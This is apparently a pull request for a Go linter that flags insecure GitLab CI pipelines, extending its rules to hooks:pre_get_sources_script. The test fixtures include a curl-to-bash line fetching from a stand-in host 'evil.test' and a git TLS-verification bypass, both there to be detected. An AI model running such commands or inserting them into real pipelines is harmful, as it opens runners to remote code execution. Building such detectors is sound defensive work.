### PR TITLE
feat: scan hooks:pre_get_sources_script in all script rules

### DIFF
--- a/internal/shellcheck/shellcheck.go
+++ b/internal/shellcheck/shellcheck.go
@@ -62,6 +62,11 @@ func Run(doc *yaml.Node, file string, binPath string) []finding.Finding {
 				}
 			}
 		}
+		if node := hooksScriptNode(def); node != nil {
+			if lines := extractLines(node); len(lines) > 0 {
+				blocks = append(blocks, scriptBlock{jobName: "default.hooks:pre_get_sources_script", lines: lines})
+			}
+		}
 	}
 	parser.EachJob(doc, func(name *yaml.Node, job *yaml.Node) {
 		for _, key := range []string{"script", "before_script", "after_script"} {
@@ -69,6 +74,11 @@ func Run(doc *yaml.Node, file string, binPath string) []finding.Finding {
 				if lines := extractLines(node); len(lines) > 0 {
 					blocks = append(blocks, scriptBlock{jobName: name.Value, lines: lines})
 				}
+			}
+		}
+		if node := hooksScriptNode(job); node != nil {
+			if lines := extractLines(node); len(lines) > 0 {
+				blocks = append(blocks, scriptBlock{jobName: name.Value, lines: lines})
 			}
 		}
 	})
@@ -158,6 +168,17 @@ func mapSeverity(level string) finding.Severity {
 	default:
 		return finding.Info
 	}
+}
+
+// hooksScriptNode returns the hooks:pre_get_sources_script sequence node for a
+// job or default: mapping, or nil. These commands run on the runner before the
+// repository is cloned and are valid shell to lint.
+func hooksScriptNode(container *yaml.Node) *yaml.Node {
+	hooks := parser.FindKey(container, "hooks")
+	if hooks == nil {
+		return nil
+	}
+	return parser.FindKey(hooks, "pre_get_sources_script")
 }
 
 // extractLines builds a flat slice of script lines with their YAML line numbers

--- a/rules/gl002.go
+++ b/rules/gl002.go
@@ -6,7 +6,6 @@ import (
 	"strings"
 
 	"github.com/glsec/glsec/internal/finding"
-	"github.com/glsec/glsec/internal/parser"
 	"gopkg.in/yaml.v3"
 )
 
@@ -40,34 +39,12 @@ var userVarRe = regexp.MustCompile(
 
 func (r *gl002) Check(doc *yaml.Node, file string) []finding.Finding {
 	var findings []finding.Finding
-	mapping := parser.Unwrap(doc)
-
-	// top-level and default script blocks
-	for _, key := range []string{"before_script", "after_script"} {
-		if node := parser.FindKey(mapping, key); node != nil {
-			findings = append(findings, checkScriptNode(node, file)...)
-		}
-	}
-	if def := parser.FindKey(mapping, "default"); def != nil {
-		for _, key := range []string{"before_script", "after_script"} {
-			if node := parser.FindKey(def, key); node != nil {
-				findings = append(findings, checkScriptNode(node, file)...)
-			}
-		}
-	}
-
-	// per-job script blocks
-	parser.EachJob(doc, func(name *yaml.Node, job *yaml.Node) {
-		for _, key := range []string{"script", "before_script", "after_script"} {
-			if node := parser.FindKey(job, key); node != nil {
-				for _, f := range checkScriptNode(node, file) {
-					f.Job = name.Value
-					findings = append(findings, f)
-				}
-			}
+	EachScriptBlock(doc, file, func(node *yaml.Node, file, job string) {
+		for _, f := range checkScriptNode(node, file) {
+			f.Job = job
+			findings = append(findings, f)
 		}
 	})
-
 	return findings
 }
 

--- a/rules/gl004.go
+++ b/rules/gl004.go
@@ -6,7 +6,6 @@ import (
 	"strings"
 
 	"github.com/glsec/glsec/internal/finding"
-	"github.com/glsec/glsec/internal/parser"
 	"gopkg.in/yaml.v3"
 )
 
@@ -24,32 +23,12 @@ var (
 
 func (r *gl004) Check(doc *yaml.Node, file string) []finding.Finding {
 	var findings []finding.Finding
-	mapping := parser.Unwrap(doc)
-
-	for _, key := range []string{"before_script", "after_script"} {
-		if node := parser.FindKey(mapping, key); node != nil {
-			findings = append(findings, scanScriptForToken(node, file)...)
-		}
-	}
-	if def := parser.FindKey(mapping, "default"); def != nil {
-		for _, key := range []string{"before_script", "after_script"} {
-			if node := parser.FindKey(def, key); node != nil {
-				findings = append(findings, scanScriptForToken(node, file)...)
-			}
-		}
-	}
-
-	parser.EachJob(doc, func(name *yaml.Node, job *yaml.Node) {
-		for _, key := range []string{"script", "before_script", "after_script"} {
-			if node := parser.FindKey(job, key); node != nil {
-				for _, f := range scanScriptForToken(node, file) {
-					f.Job = name.Value
-					findings = append(findings, f)
-				}
-			}
+	EachScriptBlock(doc, file, func(node *yaml.Node, file, job string) {
+		for _, f := range scanScriptForToken(node, file) {
+			f.Job = job
+			findings = append(findings, f)
 		}
 	})
-
 	return findings
 }
 

--- a/rules/gl011.go
+++ b/rules/gl011.go
@@ -5,7 +5,6 @@ import (
 	"regexp"
 
 	"github.com/glsec/glsec/internal/finding"
-	"github.com/glsec/glsec/internal/parser"
 	"gopkg.in/yaml.v3"
 )
 
@@ -43,32 +42,12 @@ var (
 
 func (r *gl011) Check(doc *yaml.Node, file string) []finding.Finding {
 	var findings []finding.Finding
-	mapping := parser.Unwrap(doc)
-
-	for _, key := range []string{"before_script", "after_script"} {
-		if node := parser.FindKey(mapping, key); node != nil {
-			findings = append(findings, checkScriptDownloadExecute(node, file)...)
-		}
-	}
-	if def := parser.FindKey(mapping, "default"); def != nil {
-		for _, key := range []string{"before_script", "after_script"} {
-			if node := parser.FindKey(def, key); node != nil {
-				findings = append(findings, checkScriptDownloadExecute(node, file)...)
-			}
-		}
-	}
-
-	parser.EachJob(doc, func(name *yaml.Node, job *yaml.Node) {
-		for _, key := range []string{"script", "before_script", "after_script"} {
-			if node := parser.FindKey(job, key); node != nil {
-				for _, f := range checkScriptDownloadExecute(node, file) {
-					f.Job = name.Value
-					findings = append(findings, f)
-				}
-			}
+	EachScriptBlock(doc, file, func(node *yaml.Node, file, job string) {
+		for _, f := range checkScriptDownloadExecute(node, file) {
+			f.Job = job
+			findings = append(findings, f)
 		}
 	})
-
 	return findings
 }
 

--- a/rules/gl014.go
+++ b/rules/gl014.go
@@ -29,8 +29,13 @@ func (r *gl014) Check(doc *yaml.Node, file string) []finding.Finding {
 			return
 		}
 		// Check all script blocks for an env dump line.
-		for _, key := range []string{"script", "before_script", "after_script"} {
-			scriptNode := parser.FindKey(job, key)
+		scriptNodes := []*yaml.Node{
+			parser.FindKey(job, "script"),
+			parser.FindKey(job, "before_script"),
+			parser.FindKey(job, "after_script"),
+			hookScriptNode(job),
+		}
+		for _, scriptNode := range scriptNodes {
 			if scriptNode == nil || scriptNode.Kind != yaml.SequenceNode {
 				continue
 			}

--- a/rules/gl015.go
+++ b/rules/gl015.go
@@ -5,7 +5,6 @@ import (
 	"regexp"
 
 	"github.com/glsec/glsec/internal/finding"
-	"github.com/glsec/glsec/internal/parser"
 	"gopkg.in/yaml.v3"
 )
 
@@ -29,32 +28,12 @@ var (
 
 func (r *gl015) Check(doc *yaml.Node, file string) []finding.Finding {
 	var findings []finding.Finding
-	mapping := parser.Unwrap(doc)
-
-	for _, key := range []string{"before_script", "after_script"} {
-		if node := parser.FindKey(mapping, key); node != nil {
-			findings = append(findings, checkScriptDockerTags(node, file)...)
-		}
-	}
-	if def := parser.FindKey(mapping, "default"); def != nil {
-		for _, key := range []string{"before_script", "after_script"} {
-			if node := parser.FindKey(def, key); node != nil {
-				findings = append(findings, checkScriptDockerTags(node, file)...)
-			}
-		}
-	}
-
-	parser.EachJob(doc, func(name *yaml.Node, job *yaml.Node) {
-		for _, key := range []string{"script", "before_script", "after_script"} {
-			if node := parser.FindKey(job, key); node != nil {
-				for _, f := range checkScriptDockerTags(node, file) {
-					f.Job = name.Value
-					findings = append(findings, f)
-				}
-			}
+	EachScriptBlock(doc, file, func(node *yaml.Node, file, job string) {
+		for _, f := range checkScriptDockerTags(node, file) {
+			f.Job = job
+			findings = append(findings, f)
 		}
 	})
-
 	return findings
 }
 

--- a/rules/gl016.go
+++ b/rules/gl016.go
@@ -25,7 +25,7 @@ func (r *gl016) SetTrustedHosts(hosts []string) {
 }
 
 var (
-	httpURLRe     = regexp.MustCompile(`https?://[^\s'"]+`)
+	httpURLRe      = regexp.MustCompile(`https?://[^\s'"]+`)
 	curlWgetHTTPRe = regexp.MustCompile(`\b(?:curl|wget)\b[^|]*\bhttp://`)
 	privateRanges  []*net.IPNet
 	internalTLDs   = []string{".local", ".internal", ".corp", ".lan"}
@@ -55,13 +55,16 @@ func (r *gl016) Check(doc *yaml.Node, file string) []finding.Finding {
 		}
 	}
 
-	// default: variables / before_script / after_script
+	// default: variables / before_script / after_script / hooks
 	if def := parser.FindKey(mapping, "default"); def != nil {
 		findings = append(findings, r.checkVariablesHTTP(parser.FindKey(def, "variables"), file)...)
 		for _, key := range []string{"before_script", "after_script"} {
 			if node := parser.FindKey(def, key); node != nil {
 				findings = append(findings, r.checkScriptHTTP(node, file)...)
 			}
+		}
+		if h := hookScriptNode(def); h != nil {
+			findings = append(findings, r.checkScriptHTTP(h, file)...)
 		}
 	}
 
@@ -77,6 +80,12 @@ func (r *gl016) Check(doc *yaml.Node, file string) []finding.Finding {
 					f.Job = name.Value
 					findings = append(findings, f)
 				}
+			}
+		}
+		if h := hookScriptNode(job); h != nil {
+			for _, f := range r.checkScriptHTTP(h, file) {
+				f.Job = name.Value
+				findings = append(findings, f)
 			}
 		}
 	})

--- a/rules/gl021.go
+++ b/rules/gl021.go
@@ -37,8 +37,13 @@ func (r *gl021) Check(doc *yaml.Node, file string) []finding.Finding {
 	var findings []finding.Finding
 
 	parser.EachJob(doc, func(name *yaml.Node, job *yaml.Node) {
-		for _, key := range []string{"before_script", "script", "after_script"} {
-			node := parser.FindKey(job, key)
+		scriptNodes := []*yaml.Node{
+			parser.FindKey(job, "before_script"),
+			parser.FindKey(job, "script"),
+			parser.FindKey(job, "after_script"),
+			hookScriptNode(job),
+		}
+		for _, node := range scriptNodes {
 			if node == nil || node.Kind != yaml.SequenceNode {
 				continue
 			}

--- a/rules/gl029.go
+++ b/rules/gl029.go
@@ -4,7 +4,6 @@ import (
 	"regexp"
 
 	"github.com/glsec/glsec/internal/finding"
-	"github.com/glsec/glsec/internal/parser"
 	"gopkg.in/yaml.v3"
 )
 
@@ -19,29 +18,9 @@ var dockerLoginPasswordRe = regexp.MustCompile(`\bdocker\s+login\b.*\s-p\s`)
 
 func (r *gl029) Check(doc *yaml.Node, file string) []finding.Finding {
 	var findings []finding.Finding
-	mapping := parser.Unwrap(doc)
-
-	for _, key := range []string{"before_script", "after_script"} {
-		if node := parser.FindKey(mapping, key); node != nil {
-			findings = append(findings, checkDockerLoginPassword(node, file, "")...)
-		}
-	}
-	if def := parser.FindKey(mapping, "default"); def != nil {
-		for _, key := range []string{"before_script", "after_script"} {
-			if node := parser.FindKey(def, key); node != nil {
-				findings = append(findings, checkDockerLoginPassword(node, file, "")...)
-			}
-		}
-	}
-
-	parser.EachJob(doc, func(name *yaml.Node, job *yaml.Node) {
-		for _, key := range []string{"script", "before_script", "after_script"} {
-			if node := parser.FindKey(job, key); node != nil {
-				findings = append(findings, checkDockerLoginPassword(node, file, name.Value)...)
-			}
-		}
+	EachScriptBlock(doc, file, func(node *yaml.Node, file, job string) {
+		findings = append(findings, checkDockerLoginPassword(node, file, job)...)
 	})
-
 	return findings
 }
 

--- a/rules/gl030.go
+++ b/rules/gl030.go
@@ -4,7 +4,6 @@ import (
 	"regexp"
 
 	"github.com/glsec/glsec/internal/finding"
-	"github.com/glsec/glsec/internal/parser"
 	"gopkg.in/yaml.v3"
 )
 
@@ -18,29 +17,9 @@ var sshKeyscanRe = regexp.MustCompile(`\bssh-keyscan\b`)
 
 func (r *gl030) Check(doc *yaml.Node, file string) []finding.Finding {
 	var findings []finding.Finding
-	mapping := parser.Unwrap(doc)
-
-	for _, key := range []string{"before_script", "after_script"} {
-		if node := parser.FindKey(mapping, key); node != nil {
-			findings = append(findings, checkSSHKeyscan(node, file, "")...)
-		}
-	}
-	if def := parser.FindKey(mapping, "default"); def != nil {
-		for _, key := range []string{"before_script", "after_script"} {
-			if node := parser.FindKey(def, key); node != nil {
-				findings = append(findings, checkSSHKeyscan(node, file, "")...)
-			}
-		}
-	}
-
-	parser.EachJob(doc, func(name *yaml.Node, job *yaml.Node) {
-		for _, key := range []string{"script", "before_script", "after_script"} {
-			if node := parser.FindKey(job, key); node != nil {
-				findings = append(findings, checkSSHKeyscan(node, file, name.Value)...)
-			}
-		}
+	EachScriptBlock(doc, file, func(node *yaml.Node, file, job string) {
+		findings = append(findings, checkSSHKeyscan(node, file, job)...)
 	})
-
 	return findings
 }
 

--- a/rules/gl032.go
+++ b/rules/gl032.go
@@ -5,7 +5,6 @@ import (
 	"strings"
 
 	"github.com/glsec/glsec/internal/finding"
-	"github.com/glsec/glsec/internal/parser"
 	"gopkg.in/yaml.v3"
 )
 
@@ -38,29 +37,9 @@ var sshNonKeyTargets = map[string]bool{
 
 func (r *gl032) Check(doc *yaml.Node, file string) []finding.Finding {
 	var findings []finding.Finding
-	mapping := parser.Unwrap(doc)
-
-	for _, key := range []string{"before_script", "after_script"} {
-		if node := parser.FindKey(mapping, key); node != nil {
-			findings = append(findings, checkSSHKeyEcho(node, file, "")...)
-		}
-	}
-	if def := parser.FindKey(mapping, "default"); def != nil {
-		for _, key := range []string{"before_script", "after_script"} {
-			if node := parser.FindKey(def, key); node != nil {
-				findings = append(findings, checkSSHKeyEcho(node, file, "")...)
-			}
-		}
-	}
-
-	parser.EachJob(doc, func(name *yaml.Node, job *yaml.Node) {
-		for _, key := range []string{"script", "before_script", "after_script"} {
-			if node := parser.FindKey(job, key); node != nil {
-				findings = append(findings, checkSSHKeyEcho(node, file, name.Value)...)
-			}
-		}
+	EachScriptBlock(doc, file, func(node *yaml.Node, file, job string) {
+		findings = append(findings, checkSSHKeyEcho(node, file, job)...)
 	})
-
 	return findings
 }
 

--- a/rules/gl035.go
+++ b/rules/gl035.go
@@ -4,7 +4,6 @@ import (
 	"regexp"
 
 	"github.com/glsec/glsec/internal/finding"
-	"github.com/glsec/glsec/internal/parser"
 	"gopkg.in/yaml.v3"
 )
 
@@ -21,29 +20,9 @@ var gitCredURLRe = regexp.MustCompile(
 
 func (r *gl035) Check(doc *yaml.Node, file string) []finding.Finding {
 	var findings []finding.Finding
-	mapping := parser.Unwrap(doc)
-
-	for _, key := range []string{"before_script", "after_script"} {
-		if node := parser.FindKey(mapping, key); node != nil {
-			findings = append(findings, checkGitCredURL(node, file, "")...)
-		}
-	}
-	if def := parser.FindKey(mapping, "default"); def != nil {
-		for _, key := range []string{"before_script", "after_script"} {
-			if node := parser.FindKey(def, key); node != nil {
-				findings = append(findings, checkGitCredURL(node, file, "")...)
-			}
-		}
-	}
-
-	parser.EachJob(doc, func(name *yaml.Node, job *yaml.Node) {
-		for _, key := range []string{"script", "before_script", "after_script"} {
-			if node := parser.FindKey(job, key); node != nil {
-				findings = append(findings, checkGitCredURL(node, file, name.Value)...)
-			}
-		}
+	EachScriptBlock(doc, file, func(node *yaml.Node, file, job string) {
+		findings = append(findings, checkGitCredURL(node, file, job)...)
 	})
-
 	return findings
 }
 

--- a/rules/gl038.go
+++ b/rules/gl038.go
@@ -5,7 +5,6 @@ import (
 	"regexp"
 
 	"github.com/glsec/glsec/internal/finding"
-	"github.com/glsec/glsec/internal/parser"
 	"gopkg.in/yaml.v3"
 )
 
@@ -56,29 +55,9 @@ var credChecks = []credCheck{
 
 func (r *gl038) Check(doc *yaml.Node, file string) []finding.Finding {
 	var findings []finding.Finding
-	mapping := parser.Unwrap(doc)
-
-	for _, key := range []string{"before_script", "after_script"} {
-		if node := parser.FindKey(mapping, key); node != nil {
-			findings = append(findings, checkHardcodedCredScript(node, file, "")...)
-		}
-	}
-	if def := parser.FindKey(mapping, "default"); def != nil {
-		for _, key := range []string{"before_script", "after_script"} {
-			if node := parser.FindKey(def, key); node != nil {
-				findings = append(findings, checkHardcodedCredScript(node, file, "")...)
-			}
-		}
-	}
-
-	parser.EachJob(doc, func(name *yaml.Node, job *yaml.Node) {
-		for _, key := range []string{"script", "before_script", "after_script"} {
-			if node := parser.FindKey(job, key); node != nil {
-				findings = append(findings, checkHardcodedCredScript(node, file, name.Value)...)
-			}
-		}
+	EachScriptBlock(doc, file, func(node *yaml.Node, file, job string) {
+		findings = append(findings, checkHardcodedCredScript(node, file, job)...)
 	})
-
 	return findings
 }
 

--- a/rules/gl039.go
+++ b/rules/gl039.go
@@ -5,7 +5,6 @@ import (
 	"regexp"
 
 	"github.com/glsec/glsec/internal/finding"
-	"github.com/glsec/glsec/internal/parser"
 	"gopkg.in/yaml.v3"
 )
 
@@ -39,29 +38,9 @@ var auditTools = []auditTool{
 
 func (r *gl039) Check(doc *yaml.Node, file string) []finding.Finding {
 	var findings []finding.Finding
-	mapping := parser.Unwrap(doc)
-
-	for _, key := range []string{"before_script", "after_script"} {
-		if node := parser.FindKey(mapping, key); node != nil {
-			findings = append(findings, checkAuditSilenced(node, file, "")...)
-		}
-	}
-	if def := parser.FindKey(mapping, "default"); def != nil {
-		for _, key := range []string{"before_script", "after_script"} {
-			if node := parser.FindKey(def, key); node != nil {
-				findings = append(findings, checkAuditSilenced(node, file, "")...)
-			}
-		}
-	}
-
-	parser.EachJob(doc, func(name *yaml.Node, job *yaml.Node) {
-		for _, key := range []string{"script", "before_script", "after_script"} {
-			if node := parser.FindKey(job, key); node != nil {
-				findings = append(findings, checkAuditSilenced(node, file, name.Value)...)
-			}
-		}
+	EachScriptBlock(doc, file, func(node *yaml.Node, file, job string) {
+		findings = append(findings, checkAuditSilenced(node, file, job)...)
 	})
-
 	return findings
 }
 

--- a/rules/gl040.go
+++ b/rules/gl040.go
@@ -4,7 +4,6 @@ import (
 	"regexp"
 
 	"github.com/glsec/glsec/internal/finding"
-	"github.com/glsec/glsec/internal/parser"
 	"gopkg.in/yaml.v3"
 )
 
@@ -24,29 +23,9 @@ var sslReqdRe = regexp.MustCompile(`--ssl-reqd`)
 
 func (r *gl040) Check(doc *yaml.Node, file string) []finding.Finding {
 	var findings []finding.Finding
-	mapping := parser.Unwrap(doc)
-
-	for _, key := range []string{"before_script", "after_script"} {
-		if node := parser.FindKey(mapping, key); node != nil {
-			findings = append(findings, checkFTPPlain(node, file, "")...)
-		}
-	}
-	if def := parser.FindKey(mapping, "default"); def != nil {
-		for _, key := range []string{"before_script", "after_script"} {
-			if node := parser.FindKey(def, key); node != nil {
-				findings = append(findings, checkFTPPlain(node, file, "")...)
-			}
-		}
-	}
-
-	parser.EachJob(doc, func(name *yaml.Node, job *yaml.Node) {
-		for _, key := range []string{"script", "before_script", "after_script"} {
-			if node := parser.FindKey(job, key); node != nil {
-				findings = append(findings, checkFTPPlain(node, file, name.Value)...)
-			}
-		}
+	EachScriptBlock(doc, file, func(node *yaml.Node, file, job string) {
+		findings = append(findings, checkFTPPlain(node, file, job)...)
 	})
-
 	return findings
 }
 

--- a/rules/gl042.go
+++ b/rules/gl042.go
@@ -72,6 +72,9 @@ func (r *gl042) Check(doc *yaml.Node, file string) []finding.Finding {
 				findings = append(findings, checkTLSLines(node, file, "")...)
 			}
 		}
+		if h := hookScriptNode(def); h != nil {
+			findings = append(findings, checkTLSLines(h, file, "")...)
+		}
 	}
 
 	parser.EachJob(doc, func(name *yaml.Node, job *yaml.Node) {
@@ -82,6 +85,9 @@ func (r *gl042) Check(doc *yaml.Node, file string) []finding.Finding {
 			if node := parser.FindKey(job, key); node != nil {
 				findings = append(findings, checkTLSLines(node, file, name.Value)...)
 			}
+		}
+		if h := hookScriptNode(job); h != nil {
+			findings = append(findings, checkTLSLines(h, file, name.Value)...)
 		}
 	})
 

--- a/rules/gl044.go
+++ b/rules/gl044.go
@@ -36,6 +36,12 @@ func (r *gl044) Check(doc *yaml.Node, file string) []finding.Finding {
 				findings = append(findings, f)
 			}
 		}
+		if h := hookScriptNode(job); h != nil {
+			for _, f := range checkScriptForMRSourceSHA(h, file) {
+				f.Job = name.Value
+				findings = append(findings, f)
+			}
+		}
 
 		if imageNode := parser.FindKey(job, "image"); imageNode != nil {
 			if f := checkImageForMRSourceSHA(imageNode, file, name.Value); f != nil {
@@ -90,10 +96,10 @@ func checkScriptForMRSourceSHA(node *yaml.Node, file string) []finding.Finding {
 			findings = append(findings, finding.Finding{
 				RuleID:   "GL044",
 				Severity: finding.Warn,
-				Message: "MR-triggered job checks out $CI_MERGE_REQUEST_SOURCE_BRANCH_SHA — executes attacker-controlled code with access to $CI_JOB_TOKEN and protected variables",
-				File: file,
-				Line: item.Line,
-				Col:  item.Column,
+				Message:  "MR-triggered job checks out $CI_MERGE_REQUEST_SOURCE_BRANCH_SHA — executes attacker-controlled code with access to $CI_JOB_TOKEN and protected variables",
+				File:     file,
+				Line:     item.Line,
+				Col:      item.Column,
 			})
 		}
 	}

--- a/rules/gl051.go
+++ b/rules/gl051.go
@@ -42,6 +42,7 @@ func (r *gl051) Check(doc *yaml.Node, file string) []finding.Finding {
 		for _, key := range []string{"before_script", "after_script"} {
 			findings = append(findings, gl051CheckScripts(parser.FindKey(def, key), file, "", key, patterns)...)
 		}
+		findings = append(findings, gl051CheckScripts(hookScriptNode(def), file, "", "hooks:pre_get_sources_script", patterns)...)
 	}
 
 	parser.EachJob(doc, func(nameNode *yaml.Node, jobNode *yaml.Node) {
@@ -51,6 +52,7 @@ func (r *gl051) Check(doc *yaml.Node, file string) []finding.Finding {
 		for _, key := range []string{"script", "before_script", "after_script"} {
 			findings = append(findings, gl051CheckScripts(parser.FindKey(jobNode, key), file, job, key, patterns)...)
 		}
+		findings = append(findings, gl051CheckScripts(hookScriptNode(jobNode), file, job, "hooks:pre_get_sources_script", patterns)...)
 		findings = append(findings, gl051CheckEnvironment(parser.FindKey(jobNode, "environment"), file, job, patterns)...)
 	})
 

--- a/rules/helpers.go
+++ b/rules/helpers.go
@@ -38,14 +38,24 @@ func IsDeployLikeJob(jobName string, job *yaml.Node) bool {
 	return false
 }
 
+// hookScriptNode returns the hooks:pre_get_sources_script sequence node for a
+// job or default: mapping, or nil. These commands run on the runner before the
+// repository is cloned, so they are script lines that security rules must scan.
+func hookScriptNode(container *yaml.Node) *yaml.Node {
+	hooks := parser.FindKey(container, "hooks")
+	if hooks == nil {
+		return nil
+	}
+	return parser.FindKey(hooks, "pre_get_sources_script")
+}
+
 // CollectJobScriptLines returns all scalar script lines from a job's
-// before_script, script, and after_script sections.
+// before_script, script, after_script, and hooks:pre_get_sources_script sections.
 func CollectJobScriptLines(job *yaml.Node) []*yaml.Node {
 	var lines []*yaml.Node
-	for _, key := range []string{"before_script", "script", "after_script"} {
-		node := parser.FindKey(job, key)
+	appendScalars := func(node *yaml.Node) {
 		if node == nil || node.Kind != yaml.SequenceNode {
-			continue
+			return
 		}
 		for _, item := range node.Content {
 			if item.Kind == yaml.ScalarNode {
@@ -53,47 +63,57 @@ func CollectJobScriptLines(job *yaml.Node) []*yaml.Node {
 			}
 		}
 	}
+	for _, key := range []string{"before_script", "script", "after_script"} {
+		appendScalars(parser.FindKey(job, key))
+	}
+	appendScalars(hookScriptNode(job))
 	return lines
 }
 
-// EachScriptLine visits every scalar script line in the document, calling fn
-// for each. It covers global before/after_script, default: before/after_script,
-// and all job-level script/before_script/after_script sections.
-// fn receives the line node, the file path, and the job name (empty for
-// global and default: sections).
-func EachScriptLine(doc *yaml.Node, file string, fn func(line *yaml.Node, file, job string)) {
+// EachScriptBlock visits every script *sequence node* in the document: global
+// before/after_script, default: before/after_script + hooks:pre_get_sources_script,
+// and each job's script/before_script/after_script + hooks:pre_get_sources_script.
+// fn receives the sequence node, the file path, and the job name (empty for
+// global and default: blocks). hooks: is not a valid top-level keyword, so it is
+// only visited under default: and jobs.
+func EachScriptBlock(doc *yaml.Node, file string, fn func(node *yaml.Node, file, job string)) {
 	mapping := parser.Unwrap(doc)
 
-	for _, key := range []string{"before_script", "after_script"} {
-		if node := parser.FindKey(mapping, key); node != nil && node.Kind == yaml.SequenceNode {
-			for _, item := range node.Content {
-				if item.Kind == yaml.ScalarNode {
-					fn(item, file, "")
-				}
-			}
+	visit := func(node *yaml.Node, job string) {
+		if node != nil && node.Kind == yaml.SequenceNode {
+			fn(node, file, job)
 		}
+	}
+
+	for _, key := range []string{"before_script", "after_script"} {
+		visit(parser.FindKey(mapping, key), "")
 	}
 
 	if def := parser.FindKey(mapping, "default"); def != nil {
 		for _, key := range []string{"before_script", "after_script"} {
-			if node := parser.FindKey(def, key); node != nil && node.Kind == yaml.SequenceNode {
-				for _, item := range node.Content {
-					if item.Kind == yaml.ScalarNode {
-						fn(item, file, "")
-					}
-				}
-			}
+			visit(parser.FindKey(def, key), "")
 		}
+		visit(hookScriptNode(def), "")
 	}
 
 	parser.EachJob(doc, func(name *yaml.Node, job *yaml.Node) {
 		for _, key := range []string{"script", "before_script", "after_script"} {
-			if node := parser.FindKey(job, key); node != nil && node.Kind == yaml.SequenceNode {
-				for _, item := range node.Content {
-					if item.Kind == yaml.ScalarNode {
-						fn(item, file, name.Value)
-					}
-				}
+			visit(parser.FindKey(job, key), name.Value)
+		}
+		visit(hookScriptNode(job), name.Value)
+	})
+}
+
+// EachScriptLine visits every scalar script line in the document, calling fn
+// for each. It covers the same blocks as EachScriptBlock (global, default:, and
+// per-job script sections, including hooks:pre_get_sources_script).
+// fn receives the line node, the file path, and the job name (empty for
+// global and default: sections).
+func EachScriptLine(doc *yaml.Node, file string, fn func(line *yaml.Node, file, job string)) {
+	EachScriptBlock(doc, file, func(node *yaml.Node, file, job string) {
+		for _, item := range node.Content {
+			if item.Kind == yaml.ScalarNode {
+				fn(item, file, job)
 			}
 		}
 	})

--- a/rules/hooks_test.go
+++ b/rules/hooks_test.go
@@ -1,0 +1,235 @@
+package rules
+
+import (
+	"testing"
+
+	"github.com/glsec/glsec/internal/finding"
+	"github.com/glsec/glsec/internal/parser"
+	"gopkg.in/yaml.v3"
+)
+
+type scriptRule interface {
+	Check(*yaml.Node, string) []finding.Finding
+}
+
+func runRuleSrc(t *testing.T, r scriptRule, src string) []finding.Finding {
+	t.Helper()
+	doc, err := parser.Parse([]byte(src), "test.yml")
+	if err != nil {
+		t.Fatalf("parse error: %v", err)
+	}
+	return r.Check(doc.Root, "test.yml")
+}
+
+// --- helper coverage ---
+
+func TestEachScriptLine_VisitsHooks(t *testing.T) {
+	src := `
+default:
+  hooks:
+    pre_get_sources_script:
+      - echo default-hook
+job1:
+  hooks:
+    pre_get_sources_script:
+      - echo job-hook
+  script:
+    - echo run
+`
+	doc, err := parser.Parse([]byte(src), "test.yml")
+	if err != nil {
+		t.Fatalf("parse error: %v", err)
+	}
+	var seen []string
+	EachScriptLine(doc.Root, "test.yml", func(line *yaml.Node, file, job string) {
+		seen = append(seen, line.Value)
+	})
+	want := map[string]bool{"echo default-hook": false, "echo job-hook": false, "echo run": false}
+	for _, s := range seen {
+		if _, ok := want[s]; ok {
+			want[s] = true
+		}
+	}
+	for line, found := range want {
+		if !found {
+			t.Errorf("EachScriptLine did not visit %q", line)
+		}
+	}
+}
+
+func TestEachScriptBlock_VisitsHooks(t *testing.T) {
+	src := `
+job1:
+  hooks:
+    pre_get_sources_script:
+      - echo a
+      - echo b
+`
+	doc, err := parser.Parse([]byte(src), "test.yml")
+	if err != nil {
+		t.Fatalf("parse error: %v", err)
+	}
+	blocks := 0
+	EachScriptBlock(doc.Root, "test.yml", func(node *yaml.Node, file, job string) {
+		blocks++
+		if job != "job1" {
+			t.Errorf("expected job1, got %q", job)
+		}
+	})
+	if blocks != 1 {
+		t.Fatalf("expected 1 hooks block, got %d", blocks)
+	}
+}
+
+func TestCollectJobScriptLines_IncludesHooks(t *testing.T) {
+	src := `
+job1:
+  hooks:
+    pre_get_sources_script:
+      - echo hook
+  script:
+    - echo run
+`
+	doc, err := parser.Parse([]byte(src), "test.yml")
+	if err != nil {
+		t.Fatalf("parse error: %v", err)
+	}
+	var lines []string
+	parser.EachJob(doc.Root, func(_ *yaml.Node, job *yaml.Node) {
+		for _, n := range CollectJobScriptLines(job) {
+			lines = append(lines, n.Value)
+		}
+	})
+	hasHook := false
+	for _, l := range lines {
+		if l == "echo hook" {
+			hasHook = true
+		}
+	}
+	if !hasHook {
+		t.Errorf("CollectJobScriptLines did not include hooks line, got %v", lines)
+	}
+}
+
+// --- representative rules: a pattern flagged in script: is also flagged in hooks ---
+
+func TestHooks_GL011_DownloadExecute(t *testing.T) {
+	// EachScriptBlock-migrated rule.
+	f := runRuleSrc(t, GL011, `
+job1:
+  hooks:
+    pre_get_sources_script:
+      - curl https://evil.test/x.sh | bash
+  script:
+    - echo run
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected GL011 to flag curl|bash in hooks, got %d", len(f))
+	}
+}
+
+func TestHooks_GL042_TLSBypass_Job(t *testing.T) {
+	f := runRuleSrc(t, GL042, `
+job1:
+  hooks:
+    pre_get_sources_script:
+      - git -c http.sslVerify=false clone https://example.test/repo.git
+  script:
+    - echo run
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected GL042 to flag TLS bypass in job hooks, got %d", len(f))
+	}
+}
+
+func TestHooks_GL042_TLSBypass_Default(t *testing.T) {
+	f := runRuleSrc(t, GL042, `
+default:
+  hooks:
+    pre_get_sources_script:
+      - git -c http.sslVerify=false clone https://example.test/repo.git
+job1:
+  script:
+    - echo run
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected GL042 to flag TLS bypass in default hooks, got %d", len(f))
+	}
+}
+
+func TestHooks_GL068_SetX(t *testing.T) {
+	// EachScriptLine-based rule (no migration needed, covered via helper).
+	f := runRuleSrc(t, GL068, `
+job1:
+  hooks:
+    pre_get_sources_script:
+      - set -x
+  script:
+    - echo run
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected GL068 to flag set -x in hooks, got %d", len(f))
+	}
+}
+
+func TestHooks_GL022_UnpinnedInstall(t *testing.T) {
+	// CollectJobScriptLines-based rule.
+	f := runRuleSrc(t, GL022, `
+job1:
+  hooks:
+    pre_get_sources_script:
+      - pip install ansible
+  script:
+    - echo run
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected GL022 to flag unpinned install in hooks, got %d", len(f))
+	}
+}
+
